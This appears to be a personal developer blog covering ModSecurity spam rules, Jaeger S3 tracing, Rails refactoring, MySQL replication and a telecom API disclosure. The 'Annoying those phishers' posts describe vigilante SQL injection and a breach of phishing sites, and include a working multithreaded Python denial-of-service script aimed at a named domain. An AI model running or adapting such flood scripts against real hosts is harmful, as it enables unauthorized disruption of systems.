Fighting HTTP/Web spammers with ModSecurity
Nov 24, 2021

Recently i had encountered many spam registrations and web comments on one of my client’s website. Normally a configuration in Apache or Nginx should suffice but it got really bad that i had to automate to ban those abusive spammers off the website.

So instead of doing it like a chore to manually add those abusive IP addresses to be blocked, i used modsecurity which is already configured beforehand on our websever.

The code snippet below checks for the web user’s IP address against blacklists - sbl/xbl is for IP addresses which has malware/or compromised machines and projecthoneypot (httpbl) also checks for abusive IP sources.

# Block Spam Regisrations/Web comments
# Ban for 7 days
SecAction "id:400000,phase:1,initcol:ip=%{REQUEST_HEADERS:X-Forwarded-For},pass,nolog"
SecRule IP:spam "@gt 0" "id:400001,phase:1,chain,deny,status:403,msg:'Spam host %{REQUEST_HEADERS:X-Forwarded-For} already blacklisted'"
SecRule REQUEST_METHOD "POST" "chain"
SecRule REQUEST_URI "/your/website/post/comment/path"

# spamhaus
SecRule REQUEST_URI "/your/website/post/comment/path" "id:400010,chain,deny,log,status:403,msg:'Spam host %{REQUEST_HEADERS:X-Forwarded-For} detected by sbl-xbl.spamhaus.org'"
SecRule REQUEST_METHOD "POST" "chain"
SecRule REMOTE_ADDR "@rbl sbl-xbl.spamhaus.org" "setvar:IP.spam=1,expirevar:IP.spam=604800"

# httpbl
# get your httpblkey by registering at https://www.projecthoneypot.org/
SecHttpBlKey yourhttpblkey
SecRule REQUEST_URI "/your/website/post/comment/path" "id:400012,chain,deny,log,status:403,msg:'Spam host %{REQUEST_HEADERS:X-Forwarded-For} detected by dnsbl.httpbl.org'"
SecRule REQUEST_METHOD "POST" "chain"
SecRule REMOTE_ADDR "@rbl dnsbl.httpbl.org" "setvar:IP.spam=1,expirevar:IP.spam=604800"

# Blacklisted IP Address file
SecRule REQUEST_URI "/your/website/post/comment/path" "chain,id:400020,log,deny,status:403,msg:'Spam host %{REQUEST_HEADERS:X-Forwarded-For} listed in blacklist file'"
SecRule REQUEST_METHOD "POST" "chain"
SecRule REMOTE_ADDR "@ipMatchFromFile /etc/nginx/blacklisted_ips.txt" "setvar:IP.spam=1,expirevar:IP.spam=604800"

The last part with blacklisted IPs (in blacklisted_ips.txt) which a file where you can declare the IP blocks if you need to. example:

123.123.12.0/24
12.34.0.0/16
44.44.44.44/32

To make it more automated, i would check for failed attempts at sending the POST request with a counter that blocks the IP address once it reaches the counter limit:

# Check that this is a POST
SecRule REQUEST_METHOD "POST" "id:500010,phase:5,chain,t:none,nolog,pass"
# AND Check for authentication failure and increment counters
SecRule RESPONSE_STATUS "^500" \
 "chain,setvar:IP.bf_counter=+1"
SecRule REQUEST_URI "/your/website/post/comment/path"

# Check for too many failures from a single IP address. Block for 10 minutes.
SecRule IP:bf_counter "@ge 5" \
   "id:500002,phase:5,pass,t:none, \
   setvar:IP.bf_block,\
   setvar:!IP.bf_counter,\
   expirevar:IP.bf_block=604800"

Also the above snippet is also useful when you want to block abusive users who tries to do login bruteforce attacks

Jaeger S3 without the need for Tempo/Loki
Nov 11, 2021

Before working on Jaeger-S3, not only was i looking for storing Jaeger tracing on S3 but also a way to view my traces better but i cannot find something that is not operationally expensive and expensive on renting the infrastructure so S3 was the way to go and scalable (Jaeger-S3 now supports Google GCS and Azure BlobStorage).

I had looked in Tempo/Loki but going this path would make me have more infrastructure requirements, that means THREE services: loki,tempo and grafana and finding the traces are pretty manual. Tempo is a product that achieves to support all of the opensource Tracing Platforms (including OpenTracing) but Jaeger-S3 is focused on Jaeger only.

Eversince Jaeger-S3 was released, i had been speeding up with optimizations and even loki data format compatibility (will be a breaking change in Jaeger-S3 v2 but this will take some time) if you guys want to actually use loki to read Jaeger-S3 generated data. But you don’t need to upgrade if it available to stay on v1 if loki is not really important.

With Jaeger-S3, you don’t need loki or tempo and grafana is optional when Jaeger-UI having HTTP “basic-auth” is not really an option and you would like to leverage on Grafana authentication/SSO.

Personally i had been using Grafana with Jaeger (and Jaeger-S3) and i just need to focus on Grafana to check the traces. Again, No tempo, no loki. Only Jaeger and Grafana.

Jaeger with S3 storage backend
Apr 25, 2021

Part of my work as a Site Reliablity Engineer at my work, my job is to collect information on the performance metrics of the services that i and my team manage.

One of it is to collect traces of the performance of the services and we use Jaeger as we move away from SaaS services that deemed expensive.

Jaeger was first developed by Uber and then opensourced and we had decided to use Jaeger since it allows us for distributed tracing across our Kubernetes Cluster and also it is supported by the Linux Foundation and is part of CNCF (Cloud Native Computing Foundation)

Despite that we realised that Jaeger has a dependency on ElasticSearch or Cassandra but going that route would be costly - not just as the cost of hosting these databases but also the operational costs that come with maintaining such services.

We have also looked at other options like running Tempo that supports storing data on S3 but Tempo only allows searching only by TraceID and it requires additional infrastructure (Loki, Tempo) and we would like to go light on resources.

Since Jaeger supports “plugins” using Hashicorp’s go-plugin, i and my team decided to build our own and i volunteered to develop the plugin for S3 storage. The Jaeger-S3 Plugin is available here.

This allows us to keep our operational costs as low as possible and S3 object storage is really cheap for storing data for retention.

Under the hood, we leveraged on bolt-db shipper from loki’s source code which stores the data (in boltdb format) in any object storage services (s3, gcs, azure blob storage) by also leveraging on cortex which is used by loki.

It’s ready for production and we’re shipping version 1.0 soon. So do check it out and test it out. (We’ve only tried using S3 which works but yet to try on GCS or Amazon Azure Storage).

You can also try configuring it using Amazon Dynamo or Google Bigtable (to store the indexes) which should theoretically work as we use Cortex to interface with the data storage backend.

Annoying those phishers (part 2)
Feb 8, 2021

The scammer(phisher) had shutdown onlinemaycampaign.com and hosted it on another domain running at campaignmay2u.com using the same phishing codes as onlinemaycampaign.com.

I had only reacted by attacking the phisher again after a victim lost thousands of ringgits after the phisher got his SMS TAC and bought game credits, after that i got in touch with the victim to get in contact with the investigation officer.

This scammer was persistent in his (or her) criminal activity and i had to change my strategy and i managed to find the flaws from campaignmay2u.com, got the data which is saved as CSV and JSON of all the critical evidence.

All these data was submitted to the authorities as evidence.

Although campaignmay2u.com is now pointing to another IP address, i can still access the criminal’s phishing site by altering and pointing the correct IP to that domain in my computer’s hosts file.

So i am waiting for the authorities to tell me to purge the sensitive data as the i might need to provide information to the authorities, if the authorities felt data is incomplete. I have sent them all i know including my code that monitors the activity on the phisher’s website.

Annoying those phishers
Jan 21, 2021

So a few hours ago a friend alerted me on facebook about a phishing site hosted in Turkey. After doing reconnaissance, i found out that the website is hosted in Turkey and the perpretor is actually a portuguese.

Phishing site

And this guy was collecting username and passwords of a large bank in Malaysia (I am in Malaysia).

Ran a couple of SQL Injection scripts but at the same time i wrote a DoS script that is powerful that was utilizing the perpretor’s resources and might send an alert to the provider on the activity on their network.

After working on the third version of the python script which was heavily threaded, i had also made a similar version that sends a large data that will be stored in his database. (the limit of a table size in MySQL is 65536 bytes) but i was hitting his server at 50Mbit/s running 25 python threads at one short.

so 2 scripts, my machine was running 50 threads concurrently.

Python DoS

For the two scripts, one with small payloads (to increase autoincrement faster) and a bigger payload (about 1.5MB per database row)

The reason why i chose to attack using two different payloads is to use up the adversary’s resources a lot faster (table size limit or table id limit, or the database connection has been used up)

After running it for about half-and-hour, the perpretor finally took it’s website down.

Site 404

Most of the phishing sites are really simple forms and you can check the requests to launch and attack on them.

The only purpose of such phishing sites are just to collect data and we can use that as the weakness to overload their systems, whether their web code (number of connections that it can use to connect to database) or the database itself (max table size, incremental ids)

So here is the script (do not abuse it but you can read it for educational purposes)

fills the database with large random data at 500kb per column

import logging
import threading
import requests
import random, string

def randomword(length):
   letters = string.ascii_lowercase
   return ''.join(random.choice(letters) for i in range(length))

headers = {'User-Agent': 'Mozilla/5.0'}
payload = {'pais':'ru','ip':'0.0.0.0', 'password': randomword(500000), 'systema': randomword(500000), 'ir': randomword(500000)}

def generate_requests(name):
    while True:
        logging.info("Thread %s: starting", name)
        session = requests.Session()
        r = session.post('https://onlinemaycampaign.com/home/m2u/common/indexSend.php',headers=headers,data=payload)
        print(r.text)
        logging.info("Thread %s: finishing", name)

if __name__ == "__main__":
    format = "%(asctime)s: %(message)s"
    logging.basicConfig(format=format, level=logging.INFO,
                        datefmt="%H:%M:%S")

    threads = list()
    for index in range(25):
        logging.info("Main    : create and start thread %d.", index)
        x = threading.Thread(target=generate_requests, args=(index,))
        threads.append(x)
        x.start()

    for index, thread in enumerate(threads):
        logging.info("Main    : before joining thread %d.", index)
        thread.join()
        logging.info("Main    : thread %d done", index)

Introducing NetIdentity
Dec 8, 2020

NetIdentity

I started doing this when i found out that most API Providers are too costly or has high latency (hello ip2location!) and i needed this for Awesell (eg. KYC) and Awesell has now been integrated with NetIdentity.

So it was actually designed to solve my own problem and looking at the potential NetIdentity would be for others, i decided to build it for low latency and high availibility.

You can actually use it now on Rakuten’s RapidAPI (we have still to work on our site)

The actual interesting part here is the CDN Edges running my serverless code to generate the data and make a call to origin server ONLY when necessary.

This serverless code runs directly on the CDN Edge servers closest to the user location and backed by a key-value storage distributed across the CDN Edges (think Japan, EU, US, SG.. etc)

There are two tiers here in the picture - User gets the data via Rakuten RapidAPI or directly to our CDN Edge.

For Rakuten RapidAPI latency is 130-150ms (it’s still good!, ~200 is already bad) because it has to do an additional trip to the CDN. For Example: (User -> Rakuten US -> CDN SG)

But i will recommend using our CDN directly for our future users to get less than 100ms (about 38-80ms)

Disclosure of Celcom API Data Leaks
May 26, 2020

So it’s more than a month and as a Celcom Customer i had seen a lot of updates on my Celcom Life App. I had alerted them back then and i hope they had already taken steps to mitigate the security holes on their Celcom Life’s API backend.

Back in April, My Celcom Life app was behaving strangely where when i reloaded my credit and tried to buy a data plan without refreshing my app.

Well, the request for my data plan did not go through - which it should. Then i realised that the server is validating against my local Celcom Life app Credits and not the verification of the credits were not done at the server.

So i had suspected if the server relied on my phone’s ‘credit’ information, there could be a possibility that anyone could tell the server “Hey!, i have RM100 credits, give me RM30 credits data plan for 1 month”.

Out of curiousity, i ran my Android Emulator, setup a Man-in-the-Middle attack on the Celcom Life mobile App on the Emulator by making sure Celcom Life app trusts my “own Certificate”

Little did i expect that this would turn out that i would go down the rabbit hole and discover many other issues with Celcom Life’s API security.

The first step was the Celcom Life App OTP 2FA, when you request for the 2FA token via SMS, the response from the API shockingly gave an internal server’s “analytics” username and password.

Celcom OTP

After getting logged in with the OTP and playing around with the Celcom Life App on my Android Emulator, i got to a point that i could see my own phone sim’s subscribed plans, available plans and my data usage.

Then i tried to change the parameters to query information about another random phone number by changing the last digits of my own number (NOTE: MSISDN number and that’s what telco’s call it) and got that number’s plan information as well, including the subscription plans, data usage and more.

Celcom API

There is an upstream server which is behind the Celcom Life App API server that is probably where the telco provisioning is done. This server serves data in XML which Celcom Life API parses the XML and serves in JSON.

This security vulnerability has been reported to Celcom on the 5th April 2020 and they had made updates (from what i had seen because of their downtime) on the same week.

I did not get past checking if i can get free data plans but the exposure of customer’s data was serious enough for me to forget about it (since i am a Celcom Customer). However, as much as a suspected that might be vulnerable i did not look into it further.

Celcom Life App handles transactions for credits, data plans, roaming, billing and more for PREPAID AND POSTPAID customers so i feel it is really serious headache to know someone who is on the same network (celcom) could gain access to your personal subscriber information.

Incident Timeline:

April 5 - Discovered Analytics and Subscriber data leaks

April 5 - Alerted Celcom

April 8 - Maintenance and Updates

Patching and Compiling SAMBA on macOS Mojave
Nov 19, 2019

Latest versions of macOS does not include SAMBA but has their own tool called smbutil that was imported from FreeBSD

Even brew (yeah, the package manager) did not want to maintain SAMBA in the package tree because it is a hell to compile SAMBA on macOS.

But because i wanted to message my wife on her computer in her office while being on her office’s VPN with Windows messaging popups so i decided to hack SAMBA source and make it compile and run on macOS.

The most interesting find is even the latest macOS is using the rather old editline instead of the more common GNU readline, thanks to the information i got from this the blog HERE

These are the instruction for samba-4.11.2 on macOS Mojave:

Note: Before you run commands below, make sure you have the latest Xcode installed on your macOS!

  1. Download samba-4.11.2 from https://samba.org
  2. Download the patch file: samba-4.11.2-readline.patch
  3. Uncompress the samba-4.11.2 source file
  4. Copy the patch file to the root samba-4.11.2 directory
  5. run patch -p0 < samba-4.11.2-readline.patch in samba-4.11.2 root directory
  6. Lastly, run ./configure --without-ad-dc --disable-python --without-libarchive --without-acl-support && make && make install
  7. Enjoy! 🙌

Introducing API Vault
Mar 22, 2019

I work mostly on APIs. Writing APIs on many languages and different ways of interacting with each other.

Currently at my work i write APIs in Ruby, PHP and Go. This is my current toolstack but sometimes i might use Rust for background processing or Elixir when needed. Oh yeah, Python. My favourite tool for working with data.

For my work, we have many microservices and each has their own authentication endpoints. Which is bad and JWT Tokens cannot be used in every of those microservices since the JWT Secret is different.

After looking around for solutions, in particular AuthN/AuthZ which i find to be really overkill and since i was looking for simplicity, i took a look at API Gateways.

But almost all i saw was proprietry or opensource but-you-have-to-pay-if-you-use-it-commerically.

The API Gateway that almost fill my needs was Express Gateway. But the limiting part was that they do not provide a SQL database connector. (MySQL in Particular)

So after reading Ben Church’s excellent tutorial about Reverse Proxy in Go, i modified parts of his code to suit my needs for an API Gateway.

I had talked to Ben Church to license my modifications as MIT and he agreed to it.

In summary, here is what it looks like:

API Vault

I call it “API Vault”. So basically it does these things:

  1. User will authenticate to API Vault.
  2. API Vault returns a JWT Token.
  3. User accesses a microservice via API Vault with their JWT Token.
  4. API Vault “converts” the JWT Token to another Token for accessing the microservice endpoint
  5. User gets data from their microservice endpoint

It is simple.

What API Vault does not do:

  1. Does not do authorization. This should be handled by your microservice, although in theory i can implement it. But different microservices might have different authorization rules.

So basically you need to authenticate to API Vault only once and access your services with just one token.

And here’s another thing - your microservices can have different JWT Secrets and API Vault happily does the conversion for you.

Another thing - no changes are needed for your current microservices to use API Vault. Just configure API Vault and API Vault will use the secrets from your microservices to generate it’s token to the microservice.

Your microservices can be in a private network while APIVault is only one exposed to the public for the user. network.

Even if your microservices is exposed to public, the user who had authenticated with APIVault cannot use the token given by APIVault to access those microservices endpoints.

API Vault supports MySQL, PostgreSQL and Microsoft SQL.

You can check out the Github Project here (don’t forget to star ⭐️ it!)

Phonetic Jawi Keyboard Layout for Windows
Dec 23, 2018

Supports Windows 7 (32 or 64 bit), Windows 8 and Windows 10.

Download it from here: Jawi Keyboard Phonetic Layout (QWERTY)

SHA256 SUM - 8a1f1e30a648ca80b4c7f41a38dbf7beb015f271d66c6794be51211098460157

  1. Unzip the file
  2. Go to ‘jawi’ folder
  3. Click on ‘setup’
  4. You will see on the taskbar, ‘MS’ Malay (Malaysia) or MSA Malay (Malaysia) once install is successful

UPDATE: fix ظ, ط and ث

Why I still use VIM (with exceptions)
Jun 17, 2017

Why i still use VIM for most of my coding needs?

Well, i started off as a system administrator and for most of the time i would shell into the server and run my favorite editor.

I recall once when i was starting to use Linux, around 1997, i used the now obselete pico and then my co-worked introduced me to vi

While the overhead of vi over network was good, i started to write code on my local machine in C using vi.

Many years later, i still use a variant of vi called vim.

But okay, enough for the history as to how i got to use vim. Vim to be is flexible as i can write in PHP, Ruby, Python, Node and Go with vim flawlessly supporting the languages the needs of coding in almost every language i want to write it without purchasing an editor for each language.

Example: IntelliJ has PyCharm, PHPStorm, RubyMine and i don’t want to purchase IDEs that make me “Buy” for a specific programming langauge. Do not get me wrong, they are GREAT IDEs and helps my co-workers to manage their code but i hated the idea of buying something that i will use 10% of the time. (I write in various languages - i don’t stick to one language)

The only exception of the product IntelliJ had created that i use as an IDE - Android Studio (no choice, dude, it’s Java) and there isn’t an option to help me write Java code well. (even so, i hated Android Studio, especially when it suggests a wrong UI variable, for example). You have absolutely no choice but to use an IDE in Java to be honest.

I could use Sublime, but i still have problems getting the hang of it. Or maybe TextMate (it’s clean and nice but it is macOS only - i do use Linux as my workstation at times when i don’t have a Mac).

Maybe i will use Sublime for my primary editor but i still love having to work on a terminal because of it’s flexibility.

Structuring Grape API
May 24, 2017

Most of the information on Grape gem (Ruby) is very limited and they do not show you how to structure your API versions.

But some of you would probably ask me, “Why use Grape gem when you have the new rails-api integration with Rails 5”?

As far as a understood, if you want to use rails-api (the gem, not the`baked in rails 5 –api flag) with a server-side render so you have both an API and WebApp running as a monilithic app. But i prefer grape gem as it is more flexible (AFAIK) and has a great community.

Assuming you have the Grape gem installed in your Rails 5 app:

Add this code into config/application.rb and restart your app:

    config.paths.add File.join('app', 'api'), glob: File.join('**', '*.rb')
    config.autoload_paths += Dir[Rails.root.join('app', 'api', '*')]

Now,

  1. Create the directory api in app
  2. Create a file called api.rb in the api directory.
  3. In this api.rb file you should have at least the code:
    class API < Grape::API
      insert_after Grape::Middleware::Formatter, Grape::Middleware::Logger
      format :json # required to set default all to json
      mount V1::Base => '/v1'
    end
    

In the future, if you figured you want to have a second version (ie. V2), you can directly mount the new API with new V2 code.

Next, create V1 directory within the API directory: mkdir v1

Now, at the v1 directory, we will have base.rb which is the root where you specity all your API endpoints for V1.

Your base.rb should be configured like below:

module V1
  class Base < Grape::API
    mount Products::Data
  end
end

You can mount as many endpoints as you wish, but i am adding one only for demonstration.

Next, create a “products” directory (assuming you have a model called Product) WITHIN the v1 directory: mkdir products

In the products directory, create a file called data.rb with the following contents:

module V1
  module Products
    class Data < Grape::API

      resource :products do
        desc 'List all Products'
        get do
          Product.all
        end

        desc 'Show specific product'
        get ':id' do
          Product.find(params[:id])
        end
      end
    end
  end
end

That’s it! You can try the good old curl to test it out!

curl http://localhost:3000/api/v1/products

Fat Models, Skinny Controller vs Separation of concerns, Part 2
Mar 20, 2017

In this part 2 of Fat Models and Skinny Controller vs Separation of Concern, i am going to focus more on getting code from “fat models” to concern.

For example, for omniauth-facebook with login gem Devise.

In a “fat model” configuration, the business logic code sits in the model, like below, naming the method by adding self. to from_omniauth.

class User < ApplicationRecord

    def self.from_omniauth(auth)
     if user = find_by_email(auth.info.email)  # search your db for a user with email coming from fb
       return user  #returns the user so you can sign him/her in
     else
       user = create(provider: auth.provider,    # Create a new user if a user with same email not present
                          uid: auth.uid,
                          email: auth.info.email,
                          password: Devise.friendly_token[0,20])
       user.create_account(name: auth.info.name, # you need to check how to access these attributes from auth hash by using a debugger or pry
                           address: auth.info.location,
                           image: auth.info.image
                           )
       return user
     end
    end
end

So you would access this method (usually in the controller) by User.from_omniauth as the code is in the User class (model).

To move this code to the concern you will have to add a new file, in this example in models/concerns/omniauth.rb.

You will need module Omniauth with extend ActiveSupport::Concern to extend the model, and you will need to add the business logic code in module ClassMethods and removing self..

module Omniauth
  extend ActiveSupport::Concern

  module ClassMethods
    def from_omniauth(auth)
     if user = find_by_email(auth.info.email)  # search your db for a user with email coming from fb
       return user  #returns the user so you can sign him/her in
     else
       user = create(provider: auth.provider,    # Create a new user if a user with same email not present
                          uid: auth.uid,
                          email: auth.info.email,
                          password: Devise.friendly_token[0,20])
       user.create_account(name: auth.info.name, # you need to check how to access these attributes from auth hash by using a debugger or pry
                           address: auth.info.location,
                           image: auth.info.image
                           )
       return user
     end
    end
  end
end

while in the model the code is refactored to include only one line which is include Omniauth.

class User < ApplicationRecord
  include Omniauth
end

You can still call User.from_omniauth from the controller as normal and now we had moved from having “fat models” setup to concerns.

Fat Models, Skinny Controller vs Separation of concerns, Part 1
Mar 16, 2017

I started with Rails 3.2.13 and during this days, the rails community had recommended making the Rails Controller skinny (with only request code) and making the model fat which includes the business logic.

In Rails 4.1, “concerns” was introduced to separate out the business logic from controller or model and concerns helps you to build application based on the single responsibility principle. I did not pay attention to concerns until recently where i had a lot of business logic in my model.

So i had been doing a lot of refactoring of the code for a job listing site.

An example is the following code without concerns :

class JobsController < ApplicationController

  def index
    if params[:query].present? && params[:location].present?
      @jobs = Job.search(params[:query], fields: [ { title: :word_start }, { state: :word_start }],
                                           where: { state: params[:location], published: true, published_date: {gte: 1.month.ago} }, page: params[:page], per_page: 7)
      @jobs_sponsored = Job.search(params[:query], fields: [ { title: :word_start }, { state: :word_start }],
                                           where: { state: params[:location], published: true, listing_type: [2,3], published_date: {gte: 1.month.ago} }, limit: 2, page: params[:page], per_page: 7)
    elsif params[:query].blank? && params[:location].present?
      @jobs = Job.search(params[:location], where: { published: true, published_date: {gte: 1.month.ago} }, page: params[:page], per_page: 7)
      @jobs_sponsored = Job.search(params[:location], where: { published: true, listing_type: [2,3], published_date: {gte: 1.month.ago} }, limit: 2, page: params[:page], per_page: 7)
    elsif params[:query].present? && params[:location].blank?
      @jobs = Job.search(params[:query], where: { published: true, published_date: {gte: 1.month.ago} }, page: params[:page], per_page: 7)
      @jobs_sponsored = Job.search(params[:query], where: { published: true, listing_type: [2,3], published_date: {gte: 1.month.ago} }, limit: 2, page: params[:page], per_page: 7)
    else
     @jobs = Job.where(published: true).where("published_date >= ?", 1.month.ago).page(params[:page]).per(7)
      @jobs_sponsored = Job.where(published: true).where("published_date >= ?", 1.month.ago).where("jobs.listing_type = ? OR jobs.listing_type = ?", 2, 3).order("RANDOM()").limit(2)
    end

  end
end

Bad innit? Code in the controller?

After re-factoring, i have the business logic code in a concern (ie. controller/concerns/jobs_query.rb) rather than the controller like below:

module JobsQuery
  extend ActiveSupport::Concern

   def jobs_with_job_name_and_location
      @jobs = Job.search(params[:query], fields: [ { title: :word_start }, { state: :word_start }],
                                           where: { state: params[:location], published: true, published_date: {gte: 1.month.ago} }, page: params[:page], per_page: 7)
      @jobs_sponsored = Job.search(params[:query], fields: [ { title: :word_start }, { state: :word_start }],
                                           where: { state: params[:location], published: true, listing_type: [2,3], published_date: {gte: 1.month.ago} }, limit: 2, page: params[:page], per_page: 7)
   end

    def jobs_with_location
      @jobs = Job.search(params[:location], where: { published: true, published_date: {gte: 1.month.ago} }, page: params[:page], per_page: 7)
      @jobs_sponsored = Job.search(params[:location], where: { published: true, listing_type: [2,3], published_date: {gte: 1.month.ago} }, limit: 2, page: params[:page], per_page: 7)
    end

    def jobs_with_job_name
      @jobs = Job.search(params[:query], where: { published: true, published_date: {gte: 1.month.ago} }, page: params[:page], per_page: 7)
      @jobs_sponsored = Job.search(params[:query], where: { published: true, listing_type: [2,3], published_date: {gte: 1.month.ago} }, limit: 2, page: params[:page], per_page: 7)
    end

    def all_other_jobs
      @jobs = Job.where(published: true).where("published_date >= ?", 1.month.ago).page(params[:page]).per(7)
      @jobs_sponsored = Job.where(published: true).where("published_date >= ?", 1.month.ago).where("jobs.listing_type = ? OR jobs.listing_type = ?", 2, 3).order("RANDOM()").limit(2)
    end
end

Do note include JobsQuery which Rails will autoload based on the concerns filename in the path based on Ruby On Rails convention.

class JobsController < ApplicationController
  include JobsQuery

  def index

    if params[:query].present? && params[:location].present?
      jobs_with_job_name_and_location
    elsif params[:query].blank? && params[:location].present?
      jobs_with_location
    elsif params[:query].present? && params[:location].blank?
      jobs_with_job_name
    else
      all_other_jobs
    end

  end
end

Looks short and sweet, innit?

Re-discovered a history of my internet
Mar 16, 2017

I do search about myself on search engine but a few days back i started googling “Muhammad Nuzaihan FreeBSD” (you are not likely to find it with just “Muhammad Nuzaihan”) and found my old blog at https://polycompute.wordpress.com/2014/07/ and discovered a really important picture of where i was in early 2000s.

Here is the glorified image of me running (from right), FreeBSD on Intel Pentium as webserver, OpenBSD on a 486-DX2-66 as a mail server (because of the advanced anti-spamming feature they had with OpenBSD’s SPAMD/PF and NetBSD on 486-DX2-66 as a mere testing server.

I could host all those stuff below on a static IP which my ISP provides then (the now defunct Singtel Magix). :-)

Polyglot programming and the benefits
Mar 16, 2017

Polyglot programming is the understanding and knowledge of a wide range and paradigms of programming.

I had been enjoying writing code in Ruby, Python, NodeJS, GoLang and PHP and while doing so i am exposed to certain conditions when writing any of the languages.

Even though i had been a fan of C programming for many years which limits my scope more into systems development, it was in the recent years (circa 2011-2012), i had been exploring with Ruby and it was enjoyable for a person who just started into Web Development.

With Ruby, i used Ruby On Rails framework (which i still use today to prototype - fast enough to make an MVP, or Minimum-Viable Product).

Differences in the languages helped me to be flexible in solving a problem with the paradigms it shows and apply to any other languages besides the language i am working on.

For example, while working with Python, we use try and catch a lot to make errors more forgiving. I learned Python after dabbling with Ruby and i applied what i learned in Python with Python’s equivalent of try and catch with Ruby’s own begin and except.

In other applications where we required to re-engineer a monolithic application to micro-services, i knew i had to scale the code that collects analytics data with GoLang and once we could not scale our PHP reporting app, so i rewrite it in Python. I had been using Python for generating reports using Pandas python library which was quick!

GoLang is the language that i enjoy writing most because i came from a C language background and i loved performance and that Golang had concurrency as a first-class citizen.

I had been dabbling with Haskell for a while but while i liked a language that is pure functional the lazy evaluation (have you even ran out of memory?) and having no-side effects is what i loved most but i couldn’t apply it in production and it remains as a more hobby language for me and Haskell is good when you are learning functional language.

After 15 years as a systems and network engineer (yes, network as well) with not much software development knowledge but now, it makes me more flexible in taking development roles and make it possible to architecture the infrastructure at the lowest level.

Sometimes you have to be more pragmatic in allowing yourself to take different approches when developing software, knowing that you can write the same code in the language you can only work on with less time and even lines of code to achieve the same result.

MySQL High-Availability and Load Balancing
Feb 6, 2017

Introduction

In cases where the failure of the database is not acceptable, there are ways to protect the data from database failures, especially for Single-point of failure in a scenario is where there is only one database server running.

MySQL has a lot of options on having a failover and load balancing setup from MySQL cluster, MySQL master-slave setup with MySQL router or even using a lower level load balance with Linux Virtual Server (which is a Load balancer and Fail-Over router using VRRP protocol) and MySQL master-master setup.

Choosing a Setup

MySQL Cluster is intended for large MySQL installations (ie. a server farm with 10-20 MySQL servers) which is too redundant for our installation and MySQL Master-Slave setup can only have one write (usually Master only) and one read (Slaves only).

Our choice is to use Master-Master MySQL and Linux Virtual Server (LVS/KeepaliveD) design is to allow writes to any Master (eg. 2 Master MySQL server).

The Web application can write to any one of the Master MySQL server but we needed to know and redirect connections to either one Master MySQL server when it is down or having high load.

This is where LVS (KeepaliveD) comes in. KeepaliveD is a LVS ‘router’ software which keeps track of the health of the real servers (this case the Master MySQL servers) and redirects the MySQL client connection from the Web application to either one of the MySQL server.

If in event where any of the MySQL server fails when KeepaliveD runs the health check, it will be removed from the KeepaliveD internal routing and redirect to the other MySQL Master server.

KeepaliveD keeps a floating IP (also called a Virtual IP) which the Web application connects to and KeepaliveD redirects the connection to either MySQL Server.

Assuming we have two KeepaliveD router where one is MASTER and one is BACKUP sharing this Virtual IP where if one KeepaliveD router fails (eg. MASTER), the other KeepaliveD instance (eg. BACKUP) will take over the Virtual IP where the Web application is connecting to.

NOTE: In this post there are two types of Master, MySQL Master and LVS MASTER.

Diagram

High-Availability Diagram

Configuration Steps

MySQL Server Setup

Let’s assume the MySQL server IP is as follows:

Current running MySQL Server: 192.168.1.10
New MySQL Server: 192.168.1.11

Modifications to the current server:

  1. Stop all database activity by shutting down the Web application
  2. Dump the MySQL file from the running database, $ mysqldump –u<youruser> -p mydatabase > database_dump.sql
  3. In the CURRENT running MySQL Server, backup a copy of mysql.cnf $ sudo cp /etc/mysql/my.cnf /etc/mysql/my.cnf.orig
  4. In the CURRENT running MySQL server, change the configuration /etc/mysql/my.cnf, add some options under [mysqld]

    bind-address  = 0.0.0.0
    log-bin = /var/log/mysql/mysql-bin.log
    binlog-db-db=mydatabase # this is the database we will replicate
    binlog-ignore-db=mysql
    binlog-ignore-db=test
    server-id = 1
    
  5. Restart the MySQL Server
  6. Go to mysql console, type in ‘SHOW MASTER STATUS;IMPORTANT! Take note of File and Positon. Example output:

    mysql> show master status;
    +------------------+----------+--------------+------------------+
    | File             | Position | Binlog_Do_DB | Binlog_Ignore_DB |
    +------------------+----------+--------------+------------------+
    | mysql-bin.000010 |     1193 | mydatabase   |   mysql,test     |
    +------------------+----------+--------------+------------------+
    
  7. Then in the MySQL console, add a new grant for replication.

    mysql> grant replication slave on *.* to 'replication'@'%' identified by ‘your_replication_password';
    
  8. In the NEW MySQL server, import the MySQL dump we got from the running MySQL Server `$ mysql –u -p mydatabase < database_dump.sql
  9. In the NEW MySQL Server, backup a copy of my.cnf $ sudo cp /etc/mysql/my.cnf /etc/mysql/my.cnf.orig
  10. Edit /etc/mysql/mysql.cnf in the new MySQL Server with the following under [mysqld] and save the file.

    bind-address  = 0.0.0.0
    log-bin = /var/log/mysql/mysql-bin.log
    binlog-db-db=mydatabase # this is the database we will replicate
    binlog-ignore-db=mysql
    binlog-ignore-db=test
    server-id = 2 # id is different than the CURRENT MySQL server
    
  11. Restart the MySQL on the New server.

  12. Go to the new MySQL server’s (192.168.1.11) console, we will sync this new MySQL server with the current one (IMPORTANT! YOU NEED TO SET THE MASTER_LOG_FILE and MASTER_LOG_POS ACCORDING TO THE CURRENT RUNNING SERVER’S File and Position VALUES OR IT WILL NOT BE IN SYNC):

    mysql> SLAVE STOP;
    mysql> CHANGE MASTER TO MASTER_HOST='192.168.1.10', MASTER_USER='replication', MASTER_PASSWORD='your_replication_password', MASTER_LOG_FILE=’<the File value from running server>', MASTER_LOG_POS=<the Position value from the running server>;
    mysql> SLAVE START;
    
  13. Check the Status on the New MySQL server:

    mysql> SHOW SLAVE STATUS\G;
    
  14. Make sure these two values set to ‘YES’ with waiting master to send event and NO ERRORS:

    Slave_IO_State: Waiting for master to send event
    Slave_IO_Running: Yes
    Slave_SQL_Running: Yes
    
  15. On the NEW MySQL server, run the following command: mysql> grant replication slave on *.* to 'replication'@'%' identified by ‘your_replication_password';
  16. Then on the NEW MySQL Server’s Console, type in: mysql> SHOW MASTER STATUS;
  17. Take note of the File and Position of the above command in the NEW MySQL Server.

  18. On the CURRENT Running MySQL Server (192.168.1.10), we will Sync up with the NEW MySQL Server one (IMPORTANT! YOU NEED TO SET THE MASTER_LOG_FILE and MASTER_LOG_POS ACCORDING TO THE NEW SERVER’S __File__ and __Position__ VALUES OR IT WILL NOT BE IN SYNC)

    mysql> SLAVE STOP;
    mysql> CHANGE MASTER TO MASTER_HOST='192.168.1.11', MASTER_USER='replication', MASTER_PASSWORD='your_replication_password', MASTER_LOG_FILE=’<the File value from NEW server>', MASTER_LOG_POS=<the Position value from the NEW server>;
    
  19. Check the Status of the CURRENT Running Server mysql> SHOW SLAVE STATUS\G;
